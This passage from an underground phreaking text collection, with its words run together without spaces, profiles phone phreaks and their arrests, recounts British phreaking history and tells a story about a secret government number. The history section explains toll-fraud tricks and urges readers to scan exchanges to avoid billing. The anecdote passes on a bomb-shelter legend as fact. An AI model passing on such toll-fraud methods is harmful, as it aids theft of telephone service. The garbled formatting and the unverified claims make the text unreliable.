phonephreakevangelismwithongoingstickercampaigns.Hesetuptworecording numbers,onewithinstructionsforbeginningphonephreaks,theotherwith latestnewsandtechnicaldevelopments(alongwithsomeadvancedinstruction) gatheredfromsourcesalloverthecountry. Thesedays,Bernaytoldme,hehadgonebeyondphonephreakingitself."Lately I'vebeenenjoyingplayingwithcomputersmorethanplayingwithphones.My personalthingincomputersisjustlikewithphones,Iguessthekickisin findingouthowtobeatthesystem,howtogetatthingsI'mnotsupposedto knowabout,howtodothingswiththesystemthatI'mnotsupposedtobeableto do." Asamatteroffact,Bernaytoldme,hehadjustbeenfiredfromhiscomputer programmingjobfordoingthingshewasnotsupposedtobeabletodo.Hehad beenworkingwithahugetimesharingcomputerownedbyalargecorporationbut sharedbymanyothers.Accesstothecomputerwaslimitedtothoseprogrammers andcorporationsthathadbeenassignedcertainpasswords.Andeachpassword restricteditsusertoaccesstoonlytheonesectionofthecomputercordoned offfromitsowninformationstorager.Thepasswordsystempreventedcompanies andindividualsfromstealingeachother'sinformation. "Ifiguredouthowtowriteaprogramthatwouldletmereadeveryoneelse's password,"Bernayreports."Ibeganplayingaroundwithpasswords.Ibegan lettingthepeoplewhousedthecomputerknow,insubtleways,thatIknewtheir passwords.IbegandroppingnotestothecomputersupervisorswithhintsthatI knewwhatIknow.Isignedthem'TheMidnightSkulker.'Ikeptgettingcleverer andclevererwithmymessagesanddevisingwaysofshowingthemwhatIcoulddo. I'msuretheycouldn'timagineIcoulddothethingsIwasshowingthem.But theyneverrespondedtome.Everyonceinawhilethey'dchangethepasswords, butIfoundouthowtodiscoverwhatthenewoneswere,andIletthemknow.But theyneverrespondeddirectlytotheMidnightSkulker.Ievenfinallydesigneda programwhichtheycouldusetopreventmyprogramfromfindingoutwhatitdid. IneffectItoldthemhowtowipemeout,TheMidnightSkulker.Itwasavery cleverprogram.Istartedleavingcluesaboutmyself.Iwantedthemtotryand useitandthentrytocomeupwithsomethingtogetaroundthatandreappear again.Buttheywouldn'tplay.Iwantedtogetcaught.ImeanIdidn'twantto getcaughtpersonally,butIwantedthemtonoticemeandadmitthatthey noticedme.Iwantedthemtoattempttorespond,maybeinsomeinterestingway." Finallythecomputermanagersbecameconcernedenoughaboutthethreatof informationstealingtorespond.However,insteadofusingTheMidnight Skulker'sownelegantselfdestructprogram,theycalledintheirsecurity personnel,interrogatedeveryone,foundaninformertoidentifyBernayasThe MidnightSkulker,andfiredhim. "Atfirstthesecuritypeopleadvisedthecompanytohiremefulltimetosearch outotherflawsanddiscoverothercomputerfreaks.Imighthavelikedthat.But Iprobablywouldhaveturnedintoadoubledoubleagentratherthanthedouble agenttheywanted.ImighthaveresurrectedTheMidnightSkulkerandtriedto catchmyself.Whoknows?Anyway,thehigherupsturnedthewholeideadown." YouCanTaptheF.B.I.'sCrimeControlComputerintheComfortofYourOwnHome, Perhaps. Computerfreakingmaybethewaveofthefuture.Itsuitsthephonephreak sensibilityperfectly.Gilbertson,theblueboxinventorandalifelongphone phreak,hasalsogoneonfromphonephreakingtocomputerfreaking.Beforehe gotintotheblueboxbusinessGilbertson,whoisahighlyskilledprogrammer, devisedprogramsforinternationalcurrencyarbitrage. Buthebeganplayingwithcomputersinearnestwhenhelearnedhecouldusehis blueboxintandemwiththecomputerterminalinstalledinhisapartmentbythe instrumentationfirmheworkedfor.Theprintoutterminalandkeyboardwas

equippedwithacousticalcoupling,sothatbycouplinghislittleivoryPrincess phonetotheterminalandthencouplinghisblueboxonthat,hecouldMFhis wayintoothercomputerswithcompleteanonymity,andwithoutcharge;program andreprogramthematwill;feedthemfalseormisleadinginformation;tapand stealfromthem.Heexplainedtomethathetapscomputersbybusyingoutall thelines,thengoingintoaverificationtrunk,listeningintothepasswords andinstructionsoneofthetimesharersuses,andthemMFinginandimitating them.HebelievesitwouldnotbeimpossibletocreepintotheF.B.I'scrime controlcomputerthroughalocalpolicecomputerterminalandphreakaroundwith theF.B.I.'smemorybanks.Heclaimshehassucceededinreprogramminga certainhugeinstitutionalcomputerinsuchawaythatithascordonedoffan entiresectionofitscircuitryforhispersonaluse,andatthesametime concealsthatarrangementfromanyoneelse'snotice.Ihavebeenunableto verifythisclaim. LikeCaptainCrunch,likeAlexanderGrahamBell(pseudonymofadisgruntled lookingEastCoastengineerwhoclaimstohaveinventedtheblackboxandnow sellsblackandblueboxestogamblersandradicalheavies),likemostphone phreaks,Gilbertsonbeganhiscareertryingtoripoffpayphonesasateenager. Figurethemout,thenripthemoff.Gettinghisdimebackfromthepayphoneis thephonephreak'sfirstthrillingriteofpassage.Afterlearningtheusual eighteendifferentwaysofgettinghisdimeback,Gilbertsonlearnedhowtomake masterkeystocoinphonecashboxes,andgeteveryoneelse'sdimesback.He stolesomephonecompanyequipmentandputtogetherhisownhomeswitchboard withit.Helearnedtomakeasimple"breadbox"device,ofthekindusedby bookiesintheThirties(bookiegivesanumbertohisbettingclients;thephone withthatnumberisinstalledinsomewidowlady'sapartment,butisriggedto ringinthebookie'sshopacrosstown,copstracebigbettingnumberandfind nothingbutthewidow). Notlongafterthatafternoonin1968when,deepinthestacksofanengineering library,hecameacrossatechnicaljournalwiththephonetonefrequenciesand rushedofftomakehisfirstbluebox,notlongafterthatGilbertsonabandoned averypromisingcareerinphysicalchemistryandbegansellingblueboxesfor $1,500apiece. "Ihadtoleavephysicalchemistry.Ijustranoutofinterestingthingsto learn,"hetoldmeoneevening.Wehadbeentalkingintheapartmentoftheman whoservedasthelinkbetweenGilbertsonandthesyndicateinarrangingthebig $300,000blueboxdealwhichfellthroughbecauseoflegaltrouble.Therehas beensomesmoking. "Nomoreinterestingthingstolearn,"hecontinues."Physicalchemistryturns outtobeasicksubjectwhenyoutakeittoitshighestlevel.Idon'tknow.I don'tthinkIcouldexplaintoyouhowit'ssick.Youhavetobethere.Butyou get,Idon'tknow,afalsefeelingofomnipotence.Isupposeit'slikephone phreakingthatway.Thishugethingisthere.Thiswholesystem.Andthereare holesinitandyouslipintothemlikeAliceandyou'repretendingyou'redoing somethingyou'reactuallynot,oratleastit'snolongeryouthat'sdoingwhat youthoughtyouweredoing.It'sallLewisCarroll.Physicalchemistryand phonephreaking.That'swhyyouhavethesephonephreakpseudonymslikeThe CheshireCat,theRedKing,andTheSnark.Butthere'ssomethingaboutphone phreakingthatyoudon'tfindinphysicalchemistry."Helooksupatme: "Didyoueverstealanything?" "Wellyes,I..." "Thenyouknow!Youknowtherushyouget.It'snotjustknowledge,like physicalchemistry.It'sforbiddenknowledge.Youknow.Youcanlearnabout anythingunderthesunandbeboredtodeathwithit.Buttheideathatit's illegal.Look:youcanbesmallandmobileandsmartandyou'rerippingoff

somebodylargeandpowerfulandverydangerous." PeoplelikeGilbertsonandAlexanderGrahamBellarealwaystalkingabout rippingoffthephonecompanyandscrewingMaBell.Butiftheywereshowna singlebuttonandtoldthatbypushingittheycouldturntheentirecircuitry ofA.T.&T.intomoltenpuddles,theyprobablywouldn'tpushit.Thedisgruntled inventorphonephreakneedsthephonesystemthewaythelapsedCatholicneeds theChurch,thewaySatanneedsaGod,thewayTheMidnightSkulkerneeded,more thananythingelse,response. LaterthateveningGilbertsonfinishedtellingmehowdelightedhewasatthe floodofblueboxesspreadingthroughoutthecountry,howdelightedhewasto knowthat"thistimethey'rereallyscrewed."Hesuddenlyshiftedgears. "Ofcourse.Idohavethislove/hatethingaboutMaBell.InawayIalmostlike thephonecompany.IguessI'dbeverysadiftheyweretodisintegrate.Ina wayit'sjustthatafterhavingbeensogoodtheyturnouttohavethesethings wrongwiththem.It'sthoseflawsthatallowmetogetinandmesswiththem, butIdon'tknow.There'ssomethingaboutitthatgetstoyouandmakesyou wanttogettoit,youknow." Iaskhimwhathappenswhenherunsoutofinteresting,forbiddenthingsto learnaboutthephonesystem. "Idon'tknow,maybeI'dgotoworkforthemforawhile." "Insecurityeven?" "I'ddoit,sure.IjustassoonplayI'djustassoonworkoneitherside." "Evenfiguringouthowtotrapphonephreaks?Isaid,recallingMarkBernay's game." "Yes,thatmightbeinteresting.Yes,Icouldfigureouthowtooutwitthephone phreaks.OfcourseifIgottoogoodatit,itmightbecomeboringagain.Then I'dhavetohopethephonephreaksgotmuchbetterandoutsmartedmefora while.Thatwouldmovethequalityofthegameuponelevel.Imightevenhave tohelpthemout,youknow,'Well,kids,Iwouldn'twantthistogetaroundbut didyoueverthinkof?'Icouldkeepitgoingathigherandhigherlevels forever." Thedealerspeaksupforthefirsttime.Hehasbeenstaringatthesoft blinkingpatternsoflightandcolorsonthetranslucenttiledwallfacinghim. (Actuallytherearenopatterns:thecolorandilluminationofeverytileis determinedbyacomputerizedrandomnumbergeneratordesignedbyGilbertson whichinsuresthattherecanbenomeaningtoanysequenceofeventsinthe tiles.) "Thosearenicegamesyou'retalkingabout,"saysthedealertohisfriend."But Iwouldn'tmindseeingthemscrewed.Atelephoneisn'tprivateanymore.You can'tsayanythingyoureallywanttosayonatelephoneoryouhavetogo throughthatparanoidbullshit.'Isitcooltotalkonthephone?'Imean,even ifitiscool,ifyouhavetoask'Isitcool,'thenitisn'tcool.Youknow. 'Isitcool,'thenitisn'tcool.Youknow.Likethoseblindkids,peopleare goingtostartputtingtogethertheirownprivatetelephonecompaniesifthey wanttoreallytalk.Andyouknowwhatelse.Youdon'thearsilencesonthe phoneanymore.They'vegotthistimesharingthingonlongdistancelineswhere youmakeapauseandtheysnipoutthatpieceoftimeanduseittocarrypart ofsomebodyelse'sconversation.Insteadofapause,wheresomebody'smaybe breathingorsighing,yougetthisblankholeandyouonlystarthearingagain whensomeonesaysawordandeventhebeginningofthewordisclippedoff. Silencesdon'tcountyou'repayingforthem,buttheytakethemawayfrom

you.It'snotcooltotalkandyoucan'thearsomeonewhentheydon'ttalk.What thehellgoodisthephone?Iwouldn'tmindseeingthemtotallyscrewed." TheBigMemphisBust JoeEngressianeverwantedtoscrewMaBell.Hisdreamhadalwaysbeentowork forher. ThedayIvisitedJoeinhissmallapartmentonUnionAvenueinMemphis,hewas upsetaboutanothersetbackinhisapplicationforatelephonejob. "They'restallingonit.Igotalettertodaytellingmethey'dhavetopostpone theinterviewIrequestedagain.Mylandlordreaditforme.Theygavemesome runaroundaboutwantingpapersonmyrehabilitationstatusbutIthinkthere's somethingelsegoingon." WhenIswitchedonthe40wattbulbinJoe'sroomhesometimesforgetswhen hehasguestsitlookedasiftherewasenoughtelephonehardwaretostarta smallphonecompanyofhisown. Thereisonephoneontopofhisdesk,onephonesittinginanopendrawer beneaththedesktop.NexttothedesktopphoneisacigarboxsizeMFdevice withbigtoggleswitches,andnexttothatissomekindofswitchingand couplingdevicewithjacksandalligatorplugshangingloose.Nexttothatisa Brailletypewriter.Onthefloornexttothedesk,lyingupsidedownlikeadead tortoise,isthehalfguttedbodyofanoldblackstandardphone.Acrossthe roomonatornanddustycoucharetwomorephones,oneofthematouchtone model;twotaperecorders;aheapofphonepatchesandcassettes,andalife sizetoytelephone. Ourconversationisinterruptedeverytenminutesbyphonephreaksfromallover thecountryringingJoeonjustabouteverypieceofequipmentbutthetoyphone andtheBrailletypewriter.OnefourteenyearoldblindkidfromConnecticut callsupandtellsJoehe'sgotagirlfriend.HewantstotalktoJoeabout girlfriends.Joesaysthey'lltalklaterintheeveningwhentheycanbealone ontheline.Joedrawsadeepbreath,whistleshimofftheairwithan earsplitting2600cyclewhistle.Joeispleasedtogetthecallsbuthelooked worriedandpreoccupiedthatevening,hisbrowconstantlyfurrowedoverhisdark wanderingeyes.Inadditiontothephonecompanystall,hehasjustlearnedthat hisapartmenthouseisduetobedemolishedinsixtydaysforurbanrenewal.For allitsshabbiness,theUnionAvenueapartmenthousehasbeenJoe'sfirsthome ofhisownandhe'sworriedthathemaynotfindanotherbeforethisoneis demolished. ButwhatreallybothersJoeisthatswitchmenhaven'tbeenlisteningtohim. "I'vebeendoingsomecheckingon800numberslately,andI'vediscoveredthat certain800numbersinNewHampshirecouldn'tbereachedfromMissouriand Kansas.Nowitmaysoundlikeasmallthing,butIdon'tliketoseesloppy work;itmakesmefeelbadaboutthelines.SoI'vebeencallingupswitching officesandreportingit,buttheyhaven'tcorrectedit.Icalledthemupfor thethirdtimetodayandinsteadofcheckingtheyjustgotmad.Well,thatgets memad.Imean,Idotrytohelpthem.There'ssomethingaboutthemIcan't understandyouwanttohelpthemandtheyjusttrytosayyou'redefrauding them." ItisSundayeveningandJoeinvitesmetojoinhimfordinnerataHolidayInn. FrequentlyonSundayeveningJoetakessomeofhiswelfaremoney,callsacab, andtreatshimselftoasteakdinneratoneofMemphis'thirteenHolidayInns. (MemphisistheheadquartersofHolidayInn.HolidayInnshavebeenafavorite forJoeeversincehemadehisfirstsolophonetriptoaBellswitchingoffice inJacksonville,Florida,andstayedintheHolidayInnthere.Helikestostay atHolidayInns,heexplains,becausetheyrepresentfreedomtohimandbecause

theroomsarearrangedthesamealloverthecountrysoheknowsthatany HolidayInnroomisfamiliarterritorytohim.Justlikeanytelephone.) OversteaksinthePinnacleRestaurantoftheHolidayInnMedicalCenteron MadisonAvenueinMemphis,Joetellsmethehighlightsofhislifeasaphone phreak. Atageseven,Joelearnedhisfirstphonetrick.Ameanbabysitter,tiredof listeningtolittleJoeplaywiththephoneashealwaysdid,constantly,puta lockonthephonedial."Igotsomad.Whenthere'saphonesittingthereandI can'tuseit...soIstartedgettingmadandbangingthereceiverupanddown.I noticedIbangeditonceanditdialedone.Well,thenItriedbangingit twice...."InafewminutesJoelearnedhowtodialbypressingthehookswitch attherighttime."IwassoexcitedIremembergoing'whoowhoo'andbeata boxdownonthefloor." AtageeightJoelearnedaboutwhistling."Iwaslisteningtosomeinterceptnon workingnumberrecordinginL.A.IwascallingL.A.asfarbackasthat,but I'dmainlydialnonworkingnumbersbecausetherewasnocharge,andI'dlisten totheserecordingsallday.Well,Iwaswhistling'causelisteningtothese recordingscanbeboringafterawhileeveniftheyarefromL.A.,andallofa sudden,inthemiddleofwhistling,therecordingclickedoff.Ifiddledaround whistlingsomemore,andthesamethinghappened.SoIcalleduptheswitchroom andsaid,'I'mJoe.I'meightyearsoldandIwanttoknowwhywhenIwhistle thistunethelineclicksoff.'Hetriedtoexplainittome,butitwasa littletootechnicalatthetime.Iwentonlearning.Thatwasathingnobody wasgoingtostopmefromdoing.Thephonesweremylife,andIwasgoingtopay anypricetokeeponlearning.IknewIcouldgotojail.ButIhadtodowhatI hadtodotokeeponlearning." ThephoneisringingwhenwewalkbackintoJoe'sapartmentonUnionAvenue.It isCaptainCrunch.TheCaptainhasbeenfollowingmearoundbyphone,callingup everywhereIgowithadditionalbitsofadviceandexplanationformeand whateverphonephreakIhappentobevisiting.ThistimetheCaptainreportshe iscallingfromwhathedescribesas"myhideawayhighupintheSierraNevada." HepulsesoutlustysalvosofMFandtellsJoeheisaboutto"gooutandgeta littleactiontonight.Dosomephreakingofanotherkind,ifyouknowwhatI mean."Joechuckles. TheCaptainthentellsmetomakesureIunderstandthatwhathetoldmeabout tyingupthenation'sphonelineswastrue,butthatheandthephonephreakshe knewneverusedthetechniqueforsabotage.Theyonlylearnedthetechniqueto helpthephonecompany. "Wedoalotoftroubleshootingforthem.LikethisNewHampshire/MissouriWATS lineflawI'vebeenscreamingabout.Wehelpthemmorethantheyknow." AfterwesaygoodbyetotheCaptainandJoewhistleshimofftheline,Joe tellsmeaboutadisturbingdreamhehadthenightbefore:"Ihadbeencaught andtheyweretakingmetoaprison.Itwasalongtrip.Theyweretakingmeto aprisonalonglongwayaway.AndwestoppedataHolidayInnanditwasmy lastnighteverusingthephoneandIwascryingandcrying,andtheladyatthe HolidayInnsaid,'Gosh,honey,youshouldneverbesadataHolidayInn.You shouldalwaysbehappyhere.Especiallysinceit'syourlastnight.'Andthat justmadeitworseandIwassobbingsomuchIcouldn'tstandit." TwoweeksafterIleftJoeEngressia'sapartment,phonecompanysecurityagents andMemphispolicebrokeintoit.Armedwithawarrant,whichtheyleftpinned toawall,theyconfiscatedeverypieceofequipmentintheroom,includinghis toytelephone.Joewasplacedunderarrestandtakentothecityjailwherehe wasforcedtospendthenightsincehehadnomoneyandknewnooneinMemphis tocall.

ItisnotclearwhotoldJoewhatthatnight,butsomeonetoldhimthatthe phonecompanyhadanopenandshutcaseagainsthimbecauseofrevelationsof illegalactivityhehadmadetoaphonecompanyundercoveragent. BymorningJoehadbecomeconvincedthatthereporterfromEsquire,withwhomhe hadspokentwoweeksago,wastheundercoveragent.Heprobablyhadugly thoughtsaboutsomeonehecouldn'tseegaininghisconfidence,listeningtohim talkabouthispersonalobsessionsanddreams,whileplanningallthewhileto lockhimup. "Ireallythoughthewasareporter,"EngressiatoldtheMemphisPressSeminar. "Itoldhimeverything...."Feelingbetrayed,Joeproceededtoconfess everythingtothepressandpolice. Asitturnsout,thephonecompanydiduseanundercoveragenttotrapJoe, althoughitwasnottheEsquirereporter. Ironically,securityagentswerealertedandbegantocompileacaseagainstJoe becauseofoneofhisactsofloveforthesystem:Joehadcalledaninternal servicedepartmenttoreportthathehadlocatedagroupofdefectivelong distancetrunks,andtocomplainagainabouttheNewHampshire/MissouriWATS problem.JoealwayslikedMaBell'slinestobecleanandresponsive.A suspiciousswitchmanreportedJoetothesecurityagentswhodiscoveredthatJoe hadneverhadalongdistancecallchargedtohisname. ThenthesecurityagentslearnedthatJoewasplanningoneofhisphonetripsto alocalswitchingoffice.Thesecuritypeopleplantedoneoftheiragentsinthe switchingoffice.HeposedasastudentswitchmanandfollowedJoearoundona tour.HewasextremelyfriendlyandhelpfultoJoe,leadinghimaroundthe officebythearm.WhenthetourwasoverheofferedJoearidebacktohis apartmenthouse.OnthewayheaskedJoeonetechmantoanotherabout "thoseblueboxers"he'dheardabout.Joetalkedaboutthemfreely,talkedabout hisblueboxfreely,andaboutalltheotherthingshecoulddowiththephones. Thenextdaythephonecompanysecurityagentsslappedamonitoringtapeon Joe'sline,whicheventuallypickedupanillegalcall.Thentheyappliedfor thesearchwarrantandbrokein. IncourtJoepleadednotguiltytopossessionofablueboxandtheftof service.Asympatheticjudgereducedthechargestomaliciousmischiefandfound himguiltyonthatcount,sentencedhimtotwothirtydaysentencestobeserved concurrentlyandthensuspendedthesentenceonconditionthatJoepromisenever toplaywithphonesagain.Joepromised,butthephonecompanyrefusedto restorehisservice.FortwoweeksafterthetrialJoecouldnotbereached exceptthroughthepayphoneathisapartmenthouse,andthelandlordscreened allcallsforhim. PhonephreakCarlmanagedtogetthroughtoJoeafterthetrial,andreported thatJoesoundedcrushedbythewholeaffair. "WhatI'mworriedabout,"Carltoldme,"isthatJoemeansitthistime.The promise.Thathe'llneverphonephreakagain.That'swhathetoldme,thathe's givenupphonephreakingforgood.Imeanhisentirelife.Hesaysheknows they'regoingtobewatchinghimsocloselyfortherestofhislifehe'llnever beabletomakeamovewithoutgoingstraighttojail.Hesoundedverybrokenup bythewholeexperienceofbeinginjail.Itwasawfultohearhimtalkthat way.Idon'tknow.Ihopemaybehehadtosoundthatway.Overthephone,you know." Hereportsthattheentirephonephreakundergroundisupinarmsoverthephone company'streatmentofJoe."AllthewhileJoehadhishopespinnedonhis

applicationforaphonecompanyjob,theywerestringinghimalonggettingready tobusthim.Thatgetsmemad.Joespentmostofhistimehelpingthemout.The bastards.Theythinktheycanusehimasanexample.Allofsuddenthey're harassingusonthecoast.Agentsarejumpinguponourlines.Theyjustbusted 'smuteyesterdayandrippedouthislines.ButnomatterwhatJoedoes, Idon'tthinkwe'regoingtotakethislyingdown." Twoweekslatermyphoneringsandabouteightphonephreaksinsuccessionsay hellofromabouteightdifferentplacesinthecountry,amongthemCarl,Ed,and CaptainCrunch.Anationwidephonephreakconferencelinehasbeenreestablished throughaswitchingmachinein,withthecooperationofadisgruntled switchman. "Wehaveaspecialguestwithustoday,"Carltellsme. ThenextvoiceIhearisJoe's.Hereportshappilythathehasjustmovedtoa placecalledMillington,Tennessee,fifteenmilesoutsideofMemphis,wherehe hasbeenhiredasatelephonesetrepairmanbyasmallindependentphone company.Somedayhehopestobeanequipmenttroubleshooter. "It'sthekindofjobIdreamedabout.Theyfoundoutaboutmefromthe publicitysurroundingthetrial.MaybeMaBelldidmeafavorbustingme.I'll havetelephonesinmyhandsalldaylong." "Youknowtheexpression,'Don'tgetmad,geteven'?"phonephreakCarlasked me."Well,Ithinkthey'regoingtobeverysorryaboutwhattheydidtoJoeand whatthey'retryingtodotous." 151.TheHistoryofBritishPhreakingbyLexLuthor Note:TheBritishpostoffice,istheUSequivalentofMaBell.InBritain, phreakinggoesbacktotheearlyfifties,whenthetechniqueof'tolladrop back'wasdiscovered.TollawasanexchangenearSt.Paulswhichroutedcalls betweenLondonandnearbynonLondonexchanges.Thetrickwastodialan unallocatednumber,andthendepressthereceiverrestforsecond.This flashinginitiatedthe'clearforward'signal,leavingthecallerwithanopen lineintothetollaexchange.Theycouldthendial018,whichforwardedhimto thetrunkexchangeatthattime,thefirstlongdistanceexchangeinBritainand followitwiththecodeforthedistantexchangetowhichhewouldbeconnected atnoextracharge. ThesignalsneededtocontroltheUKnetworktodaywerepublishedinthe "InstitutionofPostOfficeEngineersJournal"andreprintedintheSundaytimes (15Oct.1972). Thesignalingsystemtheyuse:SignalingsystemNo.3usespairsoffrequencies selectedfrom6tonesseparatedby120hz.Withthatinfo,thephreaksmade "bleepers"orastheyarecalledhereintheUS"bluebox",buttheydoutilize differentMFtonesthentheUS,thus,yourUSblueboxthatyousmuggledinto theUKwillnotwork,unlessyouchangethefrequencies. Intheearlyseventies,asimplersystembasedondifferentnumbersofpulses withthesamefrequency(2280hz)wasused.Formoreinfoonthat,trytogeta holdof:Atkinson's"TelephonyandSystemsTechnology". IntheearlydaysofBritishphreaking,theCambridgeuniversityTitancomputer wasusedtorecordandcirculatenumbersfoundbytheexhaustivedialingof localnetworks.Thesenumberswereusedtocreateachainoflinksfromlocal exchangetolocalexchangeacrossthecountry,bypassingthetrunkcircuits. BecausetheinternalroutingcodesintheUKnetworkarenotthesameasthose dialedbythecaller,thephreakshadtodiscoverthemby'probeandlisten' techniquesormorecommonlyknownintheUSscanning.Whattheydidwasput

inlikelysignalsandlistenedtofindoutiftheysucceeded.Theresultsof scanningwerecirculatedtootherphreaks.Discoveringeachothertooktimeat first,buteventuallythephreaksbecameorganized.The"tap"ofBritainwas called"undercurrents"whichenabledBritishphreakstosharetheinfoonnew numbers,equipmentetc. TounderstandwhattheBritishphreaksdid,thinkofthephonenetworkinthree layersoflines:Local,trunk,andinternational.IntheUK,subscribertrunk dialing(std),isthemechanismwhichtakesacallfromthelocallinesand (legitimately)elevatesittoatrunkorinternationallevel.TheUKphreaks figuredthatacallattrunklevelcanberoutedthroughanynumberof exchanges,providedthattherightroutingcodeswerefoundandusedcorrectly. Theyalsohadtodiscoverhowtogetfromlocaltotrunkleveleitherwithout beingcharged(whichtheydidwithableeperbox)orwithoutusing(std). Chaininghasalreadybeenmentionedbutitrequireslongstringsofdigitsand speechgetsmoreandmorefaintasthechaingrows,justlikeitdoeswhenyou stacktrunksbackandforthacrosstheUS.Thewaythesecurityrepssnaggedthe phreakswastoputasimple'printermeter'oraswecallit:Apenregisteron thesuspectsline,whichshowseverydigitdialedfromthesubscribersline. TheBritishprefertogetontothetrunksratherthanchaining.Onewaywasto discoverwherelocalcallsusethetrunksbetweenneighboringexchanges,starta callandstayonthetrunkinsteadofreturningtothelocallevelonreaching thedistantswitch.Thisagainrequiredexhaustivedialingandmademorework fortitan;italsorevealed'fiddles',whichwereinsertedbypostoffice engineers. Whatfiddlingmeansisthattheengineersrewiredtheexchangesfortheirown benefit.Theequipmentismodifiedtogiveaccesstoatrunkwithoutbeing charged,anoperationwhichisprettyeasyinstepbystep(SxS)electro mechanicalexchanges,whichwereinstalledinBritaineveninthe1970's(Note: IknowofabackdoorintotheCanadiansystemona4ACo.,soifyouareonSxS ora4A,tryscanning3digitexchanges,i.e.:dial999,998,997etc.Andlisten forthebeepkerchink,ifthereareno3digitcodeswhichallowdirectaccess toatandeminyourlocalexchangeandbypassestheAMAsoyouwon'tbebilled, nothavetoblast2600everytimeyouwishtoboxacall. AfamousBritish'fiddler'revealedintheearly1970'sworkedbydialing173. Thecallerthenaddedthetrunkcodeof1andthesubscriberslocalnumber.At thattime,mostengineeringtestservicesbeganwith17X,sotheengineerscould hidetheirfiddlesinthenestofservicewires.Whensecurityrepsstarted searching,thefiddleswereconcealedbytonessignaling:'Numberunobtainable' or'Equipmentengaged'whichswitchedoffafteradelay.Thenecessaryrelays aresmallandeasilyhidden. TherewasanothersidetophreakingintheUKinthesixties.BeforeSTDwas widespread,many'ordinary'peopleweredrivento. Occasionalphreakingfromsheerfrustrationattheinefficientoperator controlledtrunksystem.Thiscametoaheadduringastrikeabout1961when operatorscouldnotbereached.Nothingcomplicatedwasneeded.Manyoperators hadbeeninthehabitofrepeatingthecodesastheydialedtherequested numberssopeoplesoonlearntthenumberstheycalledfrequently.Theonly 'trick'wastoknowwhichexchangescouldbedialedthroughtopassonthetrunk number.Callersalsoneededaprettyquietplacetodoit,sincetimingrelative toclickswasimportant.ThemostfamoustrialofBritishphreakswascalledthe oldBailytrial.WhichstartedonOct.3rd,1973.Whatthephreaksdidwasdial asparenumberatalocalcallrate,butinvolvingatrunktoanotherexchange thentheysenta'clearforward'totheirlocalexchange,indicatingtoitthat thecallwasfinished;butthedistantexchangedoesn'trealizebecausethe caller'sphoneisstilloffthehook.Theynowhaveanopenlineintothe distanttrunkexchangeandsenttoita'seize'signal:'1'whichputshimonto

itsoutgoinglinesnow,iftheyknowthecodes,theworldisopentothem.All otherexchangestrusthislocalexchangetohandlethebilling;theyjust interpretthetonestheyhear.Meanwhile,thelocalexchangecollectsonlyfora localcall.Theinvestigatorsdiscoveredthephreaksholdingaconference somewhereinEnglandsurroundedbyvariousphoneequipmentandbleeperboxes, alsoprintoutslisting'secret'postofficecodes.(Theyprobablygotthemfrom trashing?)Thejudgesaid:"Sometaketoheroin,sometaketotelephones."for themphonephreakingwasnotacrime,butahobbytobesharedwithphellow enthusiastsanddiscussedwiththepostofficeopenlyoverdinnerandbymail. Theirapproachandattitudetotheworldslargestcomputer,theglobaltelephone system,wasthatofscientistsconductingexperimentsorprogrammersand engineerstestingprogramsandsystems.Thejudgeappearedtoagree,andeven askedthemforphreakingcodestousefromhislocalexchange!!! 152.BadasShitbyTheJollyRoger Recently,atelephonefanaticinthenorthwestmadeaninterestingdiscovery. Hewasexploringthe804areacode(Virginia)andfoundoutthatthe840 exchangedidsomethingstrange. Inthevastmajorityofcases,infactinallofthecasesexceptone,hewould getarecordingasiftheexchangedidn'texist.However,ifhedialed804840 andfourratherpredictablenumbers,hegotaring! Afteroneortworings,somebodypickedup.Beingexperiencedatthiskindof thing,hecouldtellthatthecalldidn't"supe",thatis,nochargeswerebeing incurredforcallingthisnumber. (Callsthatgetyoutoanerrormessage,oraspecialoperator,generallydon't supervise.)Afemalevoice,withahintofaSouthernaccentsaid,"Operator, canIhelpyou?" "Yes,"hesaid,"WhatnumberhaveIreached?" "Whatnumberdidyoudial,sir?" Hemadeupanumberthatwassimilar. "I'msorrythatisnotthenumberyoureached."Click. Hewasfascinated.Whatintheworldwasthis?Heknewhewasgoingtocall back,butbeforehedid,hetriedsomemoreexperiments.Hetriedthe840 exchangeinseveralotherareacodes.Insome,itcameupasavalidexchange. Inothers,exactlythesamethinghappenedthesamelastfourdigits,the sameSouthernbelle.Oddlyenough,helaternoticed,theareasworkedinseemed totravelinabeelinefromWashingtonDCtoPittsburgh,PA. Hecalledbackfromapayphone."Operator,canIhelpyou?" "Yes,thisisthephonecompany.I'mtestingthislineandwedon'tseemtohave anidentificationonyourcircuit.Whatofficeisthis,please?" "Whatnumberareyoutryingtoreach?" "I'mnottryingtoreachanynumber.I'mtryingtoidentifythiscircuit." "I'msorry,Ican'thelpyou." "Ma'am,ifIdon'tgetanIDonthisline,I'llhavetodisconnectit.Weshow norecordofithere."

"Holdonamoment,sir." Afteraboutaminute,shecameback."Sir,Icanhavesomeonespeaktoyou. Wouldyougivemeyournumber,please?" Hehadanticipatedthisandhehadthepayphonenumberready.Afterhegaveit, shesaid,"Mr.XXXwillgetrightbacktoyou." "Thanks."Hehungupthephone.Itrang.INSTANTLY!"OhmyGod,"hethought, "Theyweren'taskingformynumbertheywereconfirmingit!" "Hello,"hesaid,tryingtosoundauthoritative. "ThisisMr.XXX.Didyoujustmakeaninquirytomyofficeconcerningaphone number?" "Yes.Ineedanidenti" "Whatyouneedisadvice.Don'tevercallthatnumberagain.Forgetyouever knewit." Atthispointourfriendgotsonervoushejusthungup.Heexpectedtohearthe phoneringagainbutitdidn't. Overthenextfewdaysherackedhisbrainstryingtofigureoutwhatthenumber was.Heknewitwassomethingbigthatwasprettycertainatthispoint.It wassobigthatthenumberwasprogrammedintoeverycentralofficeinthe country.Heknewthisbecauseifhetriedtodialanyothernumberinthat exchange,he'dgetalocalerrormessagefromhisCO,asiftheexchangedidn't exist. Itfinallycametohim.Hehadanunclewhoworkedinafederalagency.Hehada feelingthatthiswasgovernmentrelatedandifitwas,hisunclecouldprobably findoutwhatitwas.Heaskedthenextdayandhisunclepromisedtolookinto thematter. Thenexttimehesawhisuncle,henoticedabigchangeinhismanner.Hewas trembling."Wheredidyougetthatnumber?!"heshouted."DoyouknowIalmost gotfiredforaskingaboutit?!?TheykeptwantingtoknowwhereIgotit." Ourfriendcouldn'tcontainhisexcitement."Whatisit?"hepleaded."What's thenumber?!" "IT'STHEPRESIDENT'SBOMBSHELTER!" Henevercalledthenumberafterthat.Heknewthathecouldprobablycause quiteabitofexcitementbycallingthenumberandsayingsomethinglike,"The weather'snotgoodinWashington.We'recomingoverforavisit."Butour friendwassmart.Heknewthatthereweresomethingsthatwerebetteroff unsaidandundone. 153.TelenetbyTheMadMax 